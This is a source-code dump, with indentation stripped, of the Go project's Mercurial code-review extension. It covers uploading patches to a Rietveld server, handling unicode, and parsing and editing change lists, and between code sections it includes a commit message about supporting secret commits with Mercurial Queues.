url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
form_fields = [
("filename", filename),
("status", status),
("checksum", checksum),
("is_binary", str(is_binary)),
("is_current", str(not is_base)),
]
if file_too_large:
form_fields.append(("file_too_large", "1"))
if options.email:
form_fields.append(("user", options.email))
ctype, body = EncodeMultipartFormData(form_fields, [("data", filename, content)])
response_body = rpc_server.Send(url, body, content_type=ctype)
if not response_body.startswith("OK"):
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
# Don't want to spawn too many threads, nor do we want to
# hit Rietveld too hard, or it will start serving 500 errors.
# When 8 works, it's no better than 4, and sometimes 8 is
# too many for Rietveld to handle.
MAX_PARALLEL_UPLOADS = 4
sema = threading.BoundedSemaphore(MAX_PARALLEL_UPLOADS)
upload_threads = []
finished_upload_threads = []
class UploadFileThread(threading.Thread):
def __init__(self, args):
threading.Thread.__init__(self)
self.args = args
def run(self):
UploadFile(*self.args)
finished_upload_threads.append(self)
sema.release()
def StartUploadFile(*args):
sema.acquire()
while len(finished_upload_threads) > 0:
t = finished_upload_threads.pop()
upload_threads.remove(t)
t.join()
t = UploadFileThread(args)
upload_threads.append(t)
t.start()
def WaitForUploads():
for t in upload_threads:
t.join()
patches = dict()
[patches.setdefault(v, k) for k, v in patch_list]
for filename in patches.keys():
base_content, new_content, is_binary, status = files[filename]
file_id_str = patches.get(filename)
if file_id_str.find("nobase") != -1:
base_content = None
file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
file_id = int(file_id_str)
if base_content != None:
StartUploadFile(filename, file_id, base_content, is_binary, status, True)
if new_content != None:
StartUploadFile(filename, file_id, new_content, is_binary, status, False)
WaitForUploads()
def IsImage(self, filename):
"""Returns true if the filename has an image extension."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False
return mimetype.startswith("image/")
def IsBinary(self, filename):
"""Returns true if the guessed mimetyped isnt't in text group."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False # e.g. README, "real" binaries usually have an extension
# special case for text files which don't start with text/
if mimetype in TEXT_MIMETYPES:
return False
return not mimetype.startswith("text/")
class FakeMercurialUI(object):
def __init__(self):
self.quiet = True
self.output = ''
def write(self, *args, **opts):
self.output += ' '.join(args)
def copy(self):
return self
def status(self, *args, **opts):
pass
def formatter(self, topic, opts):
from mercurial.formatter import plainformatter
return plainformatter(self, topic, opts)
def readconfig(self, *args, **opts):
pass
def expandpath(self, *args, **opts):
return global_ui.expandpath(*args, **opts)
def configitems(self, *args, **opts):
return global_ui.configitems(*args, **opts)
def config(self, *args, **opts):
return global_ui.config(*args, **opts)
use_hg_shell = False # set to True to shell out to hg always; slower
class MercurialVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Mercurial."""
def __init__(self, options, ui, repo):
super(MercurialVCS, self).__init__(options)
self.ui = ui
self.repo = repo
self.status = None
# Absolute path to repository (we can be in a subdir)
self.repo_dir = os.path.normpath(repo.root)
# Compute the subdir
cwd = os.path.normpath(os.getcwd())
assert cwd.startswith(self.repo_dir)
self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
if self.options.revision:
self.base_rev = self.options.revision
else:
mqparent, err = RunShellWithReturnCode(['hg', 'log', '--rev', 'qparent', '--template={node}'])
if not err and mqparent != "":
self.base_rev = mqparent
else:
out = RunShell(["hg", "parents", "-q"], silent_ok=True).strip()
if not out:
# No revisions; use 0 to mean a repository with nothing.
out = "0:0"
self.base_rev = out.split(':')[1].strip()
def _GetRelPath(self, filename):
"""Get relative path of a file according to the current directory,
given its logical path in the repo."""
assert filename.startswith(self.subdir), (filename, self.subdir)
return filename[len(self.subdir):].lstrip(r"\/")
def GenerateDiff(self, extra_args):
# If no file specified, restrict to the current subdir
extra_args = extra_args or ["."]
cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
data = RunShell(cmd, silent_ok=True)
svndiff = []
filecount = 0
for line in data.splitlines():
m = re.match("diff --git a/(\S+) b/(\S+)", line)
if m:
# Modify line to make it look like as it comes from svn diff.
# With this modification no changes on the server side are required
# to make upload.py work with Mercurial repos.
# NOTE: for proper handling of moved/copied files, we have to use
# the second filename.
filename = m.group(2)
svndiff.append("Index: %s" % filename)
svndiff.append("=" * 67)
filecount += 1
logging.info(line)
else:
svndiff.append(line)
if not filecount:
ErrorExit("No valid patches found in output from hg diff")
return "\n".join(svndiff) + "\n"
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
args = []
status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
silent_ok=True)
unknown_files = []
for line in status.splitlines():
st, fn = line.split(" ", 1)
if st == "?":
unknown_files.append(fn)
return unknown_files
def get_hg_status(self, rev, path):
# We'd like to use 'hg status -C path', but that is buggy
# (see http://mercurial.selenic.com/bts/issue3023).
# Instead, run 'hg status -C' without a path
# and skim the output for the path we want.
if self.status is None:
if use_hg_shell:
out = RunShell(["hg", "status", "-C", "--rev", rev])
else:
fui = FakeMercurialUI()
ret = hg_commands.status(fui, self.repo, *[], **{'rev': [rev], 'copies': True})
if ret:
raise hg_util.Abort(ret)
out = fui.output
self.status = out.splitlines()
for i in range(len(self.status)):
# line is
# A path
# M path
# etc
line = to_slash(self.status[i])
if line[2:] == path:
if i+1 < len(self.status) and self.status[i+1][:2] == ' ':
return self.status[i:i+2]
return self.status[i:i+1]
raise hg_util.Abort("no status for " + path)
def GetBaseFile(self, filename):
set_status("inspecting " + filename)
# "hg status" and "hg cat" both take a path relative to the current subdir
# rather than to the repo root, but "hg diff" has given us the full path
# to the repo root.
base_content = ""
new_content = None
is_binary = False
oldrelpath = relpath = self._GetRelPath(filename)
out = self.get_hg_status(self.base_rev, relpath)
status, what = out[0].split(' ', 1)
if len(out) > 1 and status == "A" and what == relpath:
oldrelpath = out[1].strip()
status = "M"
if ":" in self.base_rev:
base_rev = self.base_rev.split(":", 1)[0]
else:
base_rev = self.base_rev
if status != "A":
if use_hg_shell:
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath], silent_ok=True)
else:
base_content = str(self.repo[base_rev][oldrelpath].data())
is_binary = "\0" in base_content # Mercurial's heuristic
if status != "R":
new_content = open(relpath, "rb").read()
is_binary = is_binary or "\0" in new_content
if is_binary and base_content and use_hg_shell:
# Fetch again without converting newlines
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
silent_ok=True, universal_newlines=False)
if not is_binary or not self.IsImage(relpath):
new_content = None
return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
"""Splits a patch into separate pieces for each file.
Args:
data: A string containing the output of svn diff.
Returns:
A list of 2-tuple (filename, text) where text is the svn diff output
pertaining to filename.
"""
patches = []
filename = None
diff = []
for line in data.splitlines(True):
new_filename = None
if line.startswith('Index:'):
unused, new_filename = line.split(':', 1)
new_filename = new_filename.strip()
elif line.startswith('Property changes on:'):
unused, temp_filename = line.split(':', 1)
# When a file is modified, paths use '/' between directories, however
# when a property is modified '\' is used on Windows. Make them the same
# otherwise the file shows up twice.
temp_filename = to_slash(temp_filename.strip())
if temp_filename != filename:
# File has property changes but no modifications, create a new diff.
new_filename = temp_filename
if new_filename:
if filename and diff:
patches.append((filename, ''.join(diff)))
filename = new_filename
diff = [line]
continue
if diff is not None:
diff.append(line)
if filename and diff:
patches.append((filename, ''.join(diff)))
return patches
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
"""Uploads a separate patch for each file in the diff output.
Returns a list of [patch_key, filename] for each file.
"""
patches = SplitPatch(data)
rv = []
for patch in patches:
set_status("uploading patch for " + patch[0])
if len(patch[1]) > MAX_UPLOAD_SIZE:
print ("Not uploading the patch for " + patch[0] +
" because the file is too large.")
continue
form_fields = [("filename", patch[0])]
if not options.download_base:
form_fields.append(("content_upload", "1"))
files = [("data", "data.diff", patch[1])]
ctype, body = EncodeMultipartFormData(form_fields, files)
url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
print "Uploading patch for " + patch[0]
response_body = rpc_server.Send(url, body, content_type=ctype)
lines = response_body.splitlines()
if not lines or lines[0] != "OK":
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
rv.append([lines[1], patch[0]])
return rv
codereview: don't warn about secret commits
Normally the codereview plugin disables adding new commits
when not using the submit command. Unfortunately this makes
it impossible to use the Mercurial Queues extension at the
same time.
A feature called "Phases" was introduced in Mercurial 2.1
that allows marking commits as being secret; this means
they will never be pushed to the upstream repository.
We can take advantage of this feature to allow the use of
Mercurial Queues if the mq.secret option has been set in
hgrc(5) and a recent version of Mercurial is used.
R=golang-dev, rsc, minux.ma
CC=golang-dev
https://golang.org/cl/7398055
# coding=utf-8
# (The line above is necessary so that I can use 世界 in the
# *comment* below without Python getting all bent out of shape.)
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = /path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to"hg diff x.go y.go".
'''
import sys
if __name__ == "__main__":
print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
sys.exit(2)
# We require Python 2.6 for the json package.
if sys.version < '2.6':
print >>sys.stderr, "The codereview extension requires Python 2.6 or newer."
print >>sys.stderr, "You are running Python " + sys.version
sys.exit(2)
import json
import os
import re
import stat
import subprocess
import threading
import time
from mercurial import commands as hg_commands
from mercurial import util as hg_util
defaultcc = None
codereview_disabled = None
real_rollback = None
releaseBranch = None
server = "codereview.appspot.com"
server_url_base = None
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
# The different parts of the file are separated by banners like this one.
#######################################################################
# Helpers
def RelativePath(path, cwd):
n = len(cwd)
if path.startswith(cwd) and path[n] == '/':
return path[n+1:]
return path
def Sub(l1, l2):
return [l for l in l1 if l not in l2]
def Add(l1, l2):
l = l1 + Sub(l2, l1)
l.sort()
return l
def Intersect(l1, l2):
return [l for l in l1 if l in l2]
#######################################################################
# RE: UNICODE STRING HANDLING
#
# Python distinguishes between the str (string of bytes)
# and unicode (string of code points) types. Most operations
# work on either one just fine, but some (like regexp matching)
# require unicode, and others (like write) require str.
#
# As befits the language, Python hides the distinction between
# unicode and str by converting between them silently, but
# *only* if all the bytes/code points involved are 7-bit ASCII.
# This means that if you're not careful, your program works
# fine on "hello, world" and fails on "hello, 世界". And of course,
# the obvious way to be careful - use static types - is unavailable.
# So the only way is trial and error to find where to put explicit
# conversions.
#
# Because more functions do implicit conversion to str (string of bytes)
# than do implicit conversion to unicode (string of code points),
# the convention in this module is to represent all text as str,
# converting to unicode only when calling a unicode-only function
# and then converting back to str as soon as possible.
def typecheck(s, t):
if type(s) != t:
raise hg_util.Abort("type check failed: %s has type %s != %s" % (repr(s), type(s), t))
# If we have to pass unicode instead of str, ustr does that conversion clearly.
def ustr(s):
typecheck(s, str)
return s.decode("utf-8")
# Even with those, Mercurial still sometimes turns unicode into str
# and then tries to use it as ascii. Change Mercurial's default.
def set_mercurial_encoding_to_utf8():
from mercurial import encoding
encoding.encoding = 'utf-8'
set_mercurial_encoding_to_utf8()
# Even with those we still run into problems.
# I tried to do things by the book but could not convince
# Mercurial to let me check in a change with UTF-8 in the
# CL description or author field, no matter how many conversions
# between str and unicode I inserted and despite changing the
# default encoding. I'm tired of this game, so set the default
# encoding for all of Python to 'utf-8', not 'ascii'.
def default_to_utf8():
import sys
stdout, __stdout__ = sys.stdout, sys.__stdout__
reload(sys) # site.py deleted setdefaultencoding; get it back
sys.stdout, sys.__stdout__ = stdout, __stdout__
sys.setdefaultencoding('utf-8')
default_to_utf8()
#######################################################################
# Status printer for long-running commands
global_status = None
def set_status(s):
if verbosity > 0:
print >>sys.stderr, time.asctime(), s
global global_status
global_status = s
class StatusThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
# pause a reasonable amount of time before
# starting to display status messages, so that
# most hg commands won't ever see them.
time.sleep(30)
# now show status every 15 seconds
while True:
time.sleep(15 - time.time() % 15)
s = global_status
if s is None:
continue
if s == "":
s = "(unknown status)"
print >>sys.stderr, time.asctime(), s
def start_status_thread():
t = StatusThread()
t.setDaemon(True) # allowed to exit if t is still running
t.start()
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
class CL(object):
def __init__(self, name):
typecheck(name, str)
self.name = name
self.desc = ''
self.files = []
self.reviewer = []
self.cc = []
self.url = ''
self.local = False
self.web = False
self.copied_from = None # None means current user
self.mailed = False
self.private = False
self.lgtm = []
def DiskText(self):
cl = self
s = ""
if cl.copied_from:
s += "Author: " + cl.copied_from + "\n\n"
if cl.private:
s += "Private: " + str(self.private) + "\n"
s += "Mailed: " + str(self.mailed) + "\n"
s += "Description:\n"
s += Indent(cl.desc, "\t")
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
typecheck(s, str)
return s
def EditorText(self):
cl = self
s = _change_prolog
s += "\n"
if cl.copied_from:
s += "Author: " + cl.copied_from + "\n"
if cl.url != '':
s += 'URL: ' + cl.url + ' # cannot edit\n\n'
if cl.private:
s += "Private: True\n"
s += "Reviewer: " + JoinComma(cl.reviewer) + "\n"
s += "CC: " + JoinComma(cl.cc) + "\n"
s += "\n"
s += "Description:\n"
if cl.desc == '':
s += "\t<enter description here>\n"
else:
s += Indent(cl.desc, "\t")
s += "\n"
if cl.local or cl.name == "new":
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
s += "\n"
typecheck(s, str)
return s
def PendingText(self, quick=False):
cl = self
s = cl.name + ":" + "\n"
s += Indent(cl.desc, "\t")
s += "\n"
if cl.copied_from:
s += "\tAuthor: " + cl.copied_from + "\n"
if not quick:
s += "\tReviewer: " + JoinComma(cl.reviewer) + "\n"
for (who, line) in cl.lgtm:
s += "\t\t" + who + ": " + line + "\n"
s += "\tCC: " + JoinComma(cl.cc) + "\n"
s += "\tFiles:\n"
for f in cl.files:
s += "\t\t" + f + "\n"
typecheck(s, str)
return s
def Flush(self, ui, repo):
if self.name == "new":
self.Upload(ui, repo, gofmt_just_warn=True, creating=True)
dir = CodeReviewDir(ui, repo)
path = dir + '/cl.' + self.name
f = open(path+'!', "w")
f.write(self.DiskText())
f.close()
if sys.platform == "win32" and os.path.isfile(path):
os.remove(path)
os.rename(path+'!', path)
if self.web and not self.copied_from:
EditDesc(self.name, desc=self.desc,
reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc),
private=self.private)
def Delete(self, ui, repo):
dir = CodeReviewDir(ui, repo)
os.unlink(dir + "/cl." + self.name)
def Subject(self):
s = line1(self.desc)
if len(s) > 60:
s = s[0:55] + "..."
if self.name != "new":
s = "code review %s: %s" % (self.name, s)
typecheck(s, str)
return s
def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False, creating=False, quiet=False):
if not self.files and not creating:
ui.warn("no files in change list\n")
if ui.configbool("codereview", "force_gofmt", True) and gofmt:
CheckFormat(ui, repo, self.files, just_warn=gofmt_just_warn)
set_status("uploading CL metadata + diffs")
os.chdir(repo.root)
form_fields = [
("content_upload", "1"),
("reviewers", JoinComma(self.reviewer)),
("cc", JoinComma(self.cc)),
("description", self.desc),
("base_hashes", ""),
]
if self.name != "new":
form_fields.append(("issue", self.name))
vcs = None
# We do not include files when creating the issue,
# because we want the patch sets to record the repository
# and base revision they are diffs against. We use the patch
# set message for that purpose, but there is no message with
# the first patch set. Instead the message gets used as the
# new CL's overall subject. So omit the diffs when creating
# and then we'll run an immediate upload.
# This has the effect that every CL begins with an empty "Patch set 1".
if self.files and not creating:
vcs = MercurialVCS(upload_options, ui, repo)
data = vcs.GenerateDiff(self.files)
files = vcs.GetBaseFiles(data)
if len(data) > MAX_UPLOAD_SIZE:
uploaded_diff_file = []
form_fields.append(("separate_patches", "1"))
else:
uploaded_diff_file = [("data", "data.diff", data)]
else:
uploaded_diff_file = [("data", "data.diff", emptydiff)]
if vcs and self.name != "new":
form_fields.append(("subject", "diff -r " + vcs.base_rev + " " + ui.expandpath("default")))
else:
# First upload sets the subject for the CL itself.
form_fields.append(("subject", self.Subject()))
ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
response_body = MySend("/upload", body, content_type=ctype)
patchset = None
msg = response_body
lines = msg.splitlines()
if len(lines) >= 2:
msg = lines[0]
patchset = lines[1].strip()
patches = [x.split(" ", 1) for x in lines[2:]]
if response_body.startswith("Issue updated.") and quiet:
pass
else:
ui.status(msg + "\n")
set_status("uploaded CL metadata + diffs")
if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
raise hg_util.Abort("failed to update issue: " + response_body)
issue = msg[msg.rfind("/")+1:]
self.name = issue
if not self.url:
self.url = server_url_base + self.name
if not uploaded_diff_file:
set_status("uploading patches")
patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
if vcs:
set_status("uploading base files")
vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
if send_mail:
set_status("sending mail")
MySend("/" + issue + "/mail", payload="")
self.web = True
set_status("flushing changes to disk")
self.Flush(ui, repo)
return
def Mail(self, ui, repo):
pmsg = "Hello " + JoinComma(self.reviewer)
if self.cc:
pmsg += " (cc: %s)" % (', '.join(self.cc),)
pmsg += ",\n"
pmsg += "\n"
repourl = ui.expandpath("default")
if not self.mailed:
pmsg += "I'd like you to review this change to\n" + repourl + "\n"
else:
pmsg += "Please take another look.\n"
typecheck(pmsg, str)
PostMessage(ui, self.name, pmsg, subject=self.Subject())
self.mailed = True
self.Flush(ui, repo)
def GoodCLName(name):
typecheck(name, str)
return re.match("^[0-9]+$", name)
def ParseCL(text, name):
typecheck(text, str)
typecheck(name, str)
sname = None
lineno = 0
sections = {
'Author': '',
'Description': '',
'Files': '',
'URL': '',
'Reviewer': '',
'CC': '',
'Mailed': '',
'Private': '',
}
for line in text.split('\n'):
lineno += 1
line = line.rstrip()
if line != '' and line[0] == '#':
continue
if line == '' or line[0] == ' ' or line[0] == '\t':
if sname == None and line != '':
return None, lineno, 'text outside section'
if sname != None:
sections[sname] += line + '\n'
continue
p = line.find(':')
if p >= 0:
s, val = line[:p].strip(), line[p+1:].strip()
if s in sections:
sname = s
if val != '':
sections[sname] += val + '\n'
continue
return None, lineno, 'malformed section header'
for k in sections:
sections[k] = StripCommon(sections[k]).rstrip()
cl = CL(name)
if sections['Author']:
cl.copied_from = sections['Author']
cl.desc = sections['Description']
for line in sections['Files'].split('\n'):
i = line.find('#')
if i >= 0:
line = line[0:i].rstrip()
line = line.strip()
if line == '':
continue
cl.files.append(line)
cl.reviewer = SplitCommaSpace(sections['Reviewer'])
cl.cc = SplitCommaSpace(sections['CC'])
cl.url = sections['URL']
if sections['Mailed'] != 'False':
# Odd default, but avoids spurious mailings when
# reading old CLs that do not have a Mailed: line.
# CLs created with this update will always have
# Mailed: False on disk.
cl.mailed = True
if sections['Private'] in ('True', 'true', 'Yes', 'yes'):
cl.private = True
if cl.desc == '<enter description here>':
cl.desc = ''
return cl, 0, ''
def SplitCommaSpace(s):
typecheck(s, str)
s = s.strip()
if s == "":
return []
return re.split(", *", s)
def CutDomain(s):
typecheck(s, str)
i = s.find('@')
if i >= 0:
s = s[0:i]
return s
def JoinComma(l):
for s in l:
typecheck(s, str)
return ", ".join(l)
def ExceptionDetail():
s = str(sys.exc_info()[0])
if s.startswith("<type '") and s.endswith("'>"):
s = s[7:-2]
elif s.startswith("<class '") and s.endswith("'>"):
s = s[8:-2]
arg = str(sys.exc_info()[1])
if len(arg) > 0:
s += ": " + arg
return s
def IsLocalCL(ui, repo, name):
return GoodCLName(name) and os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
def LoadCL(ui, repo, name, web=True):
typecheck(name, str)
set_status("loading CL " + name)
if not GoodCLName(name):
return None, "invalid CL name"
dir = CodeReviewDir(ui, repo)
path = dir + "cl." + name
if os.access(path, 0):
ff = open(path)
text = ff.read()
ff.close()
cl, lineno, err = ParseCL(text, name)
if err != "":
return None, "malformed CL data: "+err
cl.local = True
else:
cl = CL(name)
if web:
set_status("getting issue metadata from web")
d = JSONGet(ui, "/api/" + name + "?messages=true")
set_status(None)
if d is None:
return None, "cannot load CL %s from server" % (name,)
if 'owner_email' not in d or 'issue' not in d or str(d['issue']) != name:
return None, "malformed response loading CL data from code review server"
cl.dict = d
cl.reviewer = d.get('reviewers', [])
cl.cc = d.get('cc', [])
if cl.local and cl.copied_from and cl.desc:
# local copy of CL written by someone else
# and we saved a description. use that one,
# so that committers can edit the description
# before doing hg submit.
pass
else:
cl.desc = d.get('description', "")
cl.url = server_url_base + name
cl.web = True
cl.private = d.get('private', False) != False
cl.lgtm = []
for m in d.get('messages', []):
if m.get('approval', False) == True or m.get('disapproval', False) == True:
who = re.sub('@.*', '', m.get('sender', ''))
text = re.sub("\n(.|\n)*", '', m.get('text', ''))
cl.lgtm.append((who, text))
set_status("loaded CL " + name)
return cl, ''
class LoadCLThread(threading.Thread):
def __init__(self, ui, repo, dir, f, web):
threading.Thread.__init__(self)
self.ui = ui
self.repo = repo
self.dir = dir
self.f = f
self.web = web
self.cl = None
def run(self):
cl, err = LoadCL(self.ui, self.repo, self.f[3:], web=self.web)
if err != '':
self.ui.warn("loading "+self.dir+self.f+": " + err + "\n")
return
self.cl = cl
# Load all the CLs from this repository.
def LoadAllCL(ui, repo, web=True):
dir = CodeReviewDir(ui, repo)
m = {}
files = [f for f in os.listdir(dir) if f.startswith('cl.')]
if not files:
return m
active = []
first = True
for f in files:
t = LoadCLThread(ui, repo, dir, f, web)
t.start()
if web and first:
# first request: wait in case it needs to authenticate
# otherwise we get lots of user/password prompts
# running in parallel.
t.join()
if t.cl:
m[t.cl.name] = t.cl
first = False
else:
active.append(t)
for t in active:
t.join()
if t.cl:
m[t.cl.name] = t.cl
return m
# Find repository root. On error, ui.warn and return None
def RepoDir(ui, repo):
url = repo.url();
if not url.startswith('file:'):
ui.warn("repository %s is not in local file system\n" % (url,))
return None
url = url[5:]
if url.endswith('/'):
url = url[:-1]
typecheck(url, str)
return url
# Find (or make) code review directory. On error, ui.warn and return None
def CodeReviewDir(ui, repo):
dir = RepoDir(ui, repo)
if dir == None:
return None
dir += '/.hg/codereview/'
if not os.path.isdir(dir):
try:
os.mkdir(dir, 0700)
except:
ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
return None
typecheck(dir, str)
return dir
# Turn leading tabs into spaces, so that the common white space
# prefix doesn't get confused when people's editors write out
# some lines with spaces, some with tabs. Only a heuristic
# (some editors don't use 8 spaces either) but a useful one.
def TabsToSpaces(line):
i = 0
while i < len(line) and line[i] == '\t':
i += 1
return ' '*(8*i) + line[i:]
# Strip maximal common leading white space prefix from text
def StripCommon(text):
typecheck(text, str)
ws = None
for line in text.split('\n'):
line = line.rstrip()
if line == '':
continue
line = TabsToSpaces(line)
white = line[:len(line)-len(line.lstrip())]
if ws == None:
ws = white
else:
common = ''
for i in range(min(len(white), len(ws))+1):
if white[0:i] == ws[0:i]:
common = white[0:i]
ws = common
if ws == '':
break
if ws == None:
return text
t = ''
for line in text.split('\n'):
line = line.rstrip()
line = TabsToSpaces(line)
if line.startswith(ws):
line = line[len(ws):]
if line == '' and t == '':
continue
t += line + '\n'
while len(t) >= 2 and t[-2:] == '\n\n':
t = t[:-1]
typecheck(t, str)
return t
# Indent text with indent.
def Indent(text, indent):
typecheck(text, str)
typecheck(indent, str)
t = ''
for line in text.split('\n'):
t += indent + line + '\n'
typecheck(t, str)
return t
# Return the first line of l
def line1(text):
typecheck(text, str)
return text.split('\n')[0]
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""
desc_re = '^(.+: |(tag )?(release|weekly)\.|fix build|undo CL)'
desc_msg = '''Your CL description appears not to use the standard form.
The first line of your change description is conventionally a
one-line summary of the change, prefixed by the primary affected package,
and is used as the subject for code review mail; the rest of the description
elaborates.
Examples:
encoding/rot13: new package
math: add IsInf, IsNaN
net: fix cname in LookupHost
unicode: update to Unicode 5.0.2
'''
def promptyesno(ui, msg):
return ui.promptchoice(msg, ["&yes", "&no"], 0) == 0
def promptremove(ui, repo, f):
if promptyesno(ui, "hg remove %s (y/n)?" % (f,)):
if hg_commands.remove(ui, repo, 'path:'+f) != 0:
ui.warn("error removing %s" % (f,))
def promptadd(ui, repo, f):
if promptyesno(ui, "hg add %s (y/n)?" % (f,)):
if hg_commands.add(ui, repo, 'path:'+f) != 0:
ui.warn("error adding %s" % (f,))
def EditCL(ui, repo, cl):
set_status(None) # do not show status
s = cl.EditorText()
while True:
s = ui.edit(s, ui.username())
# We can't trust Mercurial + Python not to die before making the change,
# so, by popular demand, just scribble the most recent CL edit into
# $(hg root)/last-change so that if Mercurial does die, people
# can look there for their work.
try:
f = open(repo.root+"/last-change", "w")
f.write(s)
f.close()
except:
pass
clx, line, err = ParseCL(s, cl.name)
if err != '':
if not promptyesno(ui, "error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err)):
return "change list not modified"
continue
# Check description.
if clx.desc == '':
if promptyesno(ui, "change list should have a description\nre-edit (y/n)?"):
continue
elif re.search('<enter reason for undo>', clx.desc):
if promptyesno(ui, "change list description omits reason for undo\nre-edit (y/n)?"):
continue
elif not re.match(desc_re, clx.desc.split('\n')[0]):
if promptyesno(ui, desc_msg + "re-edit (y/n)?"):
continue
# Check file list for files that need to be hg added or hg removed
# or simply aren't understood.
pats = ['path:'+f for f in clx.files]
changed = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
deleted = hg_matchPattern(ui, repo, *pats, deleted=True)
unknown = hg_matchPattern(ui, repo, *pats, unknown=True)
ignored = hg_matchPattern(ui, repo, *pats, ignored=True)
clean = hg_matchPattern(ui, repo, *pats, clean=True)
files = []
for f in clx.files:
if f in changed:
files.append(f)
continue
if f in deleted:
promptremove(ui, repo, f)
files.append(f)
continue
if f in unknown:
promptadd(ui, repo, f)
files.append(f)
continue
if f in ignored:
ui.warn("error: %s is excluded by .hgignore; omitting\n" % (f,))
continue
if f in clean:
ui.warn("warning: %s is listed in the CL but unchanged\n" % (f,))
files.append(f)
continue
p = repo.root + '/' + f
if os.path.isfile(p):
ui.warn("warning: %s is a file but not known to hg\n" % (f,))
files.append(f)
continue
if os.path.isdir(p):
ui.warn("error: %s is a directory, not a file; omitting\n" % (f,))
continue
ui.warn("error: %s does not exist; omitting\n" % (f,))
clx.files = files
cl.desc = clx.desc
cl.reviewer = clx.reviewer
cl.cc = clx.cc
cl.files = clx.files
cl.private = clx.private
break
return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
def CommandLineCL(ui, repo, pats, opts, op="verb", defaultcc=None):
if len(pats) > 0 and GoodCLName(pats[0]):
if len(pats) != 1:
return None, "cannot specify change number and file names"
if opts.get('message'):
return None, "cannot use -m with existing CL"
cl, err = LoadCL(ui, repo, pats[0], web=True)
if err != "":
return None, err
else:
cl = CL("new")
cl.local = True
cl.files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
if not cl.files:
return None, "no files changed (use hg %s <number> to use existing CL)" % op
if opts.get('reviewer'):
cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
if opts.get('cc'):
cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
if defaultcc:
cl.cc = Add(cl.cc, defaultcc)
if cl.name == "new":
if opts.get('message'):
cl.desc = opts.get('message')
else:
err = EditCL(ui, repo, cl)
if err != '':
return None, err
return cl, ""
#######################################################################
# Change list file management
# Return list of changed files in repository that match pats.
# The patterns came from the command line, so we warn
# if they have no effect or cannot be understood.
def ChangedFiles(ui, repo, pats, taken=None):
taken = taken or {}
# Run each pattern separately so that we can warn about
# patterns that didn't do anything useful.
for p in pats:
for f in hg_matchPattern(ui, repo, p, unknown=True):
promptadd(ui, repo, f)
for f in hg_matchPattern(ui, repo, p, removed=True):
promptremove(ui, repo, f)
files = hg_matchPattern(ui, repo, p, modified=True, added=True, removed=True)
for f in files:
if f in taken:
ui.warn("warning: %s already in CL %s\n" % (f, taken[f].name))
if not files:
ui.warn("warning: %s did not match any modified files\n" % (p,))
# Again, all at once (eliminates duplicates)
l = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
l.sort()
if taken:
l = Sub(l, taken.keys())
return l
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
l = hg_matchPattern(ui, repo, *pats, modified=True, added=True)
l.sort()
return l
# Return list of files claimed by existing CLs
def Taken(ui, repo):
all = LoadAllCL(ui, repo, web=False)
taken = {}
for _, cl in all.items():
for f in cl.files:
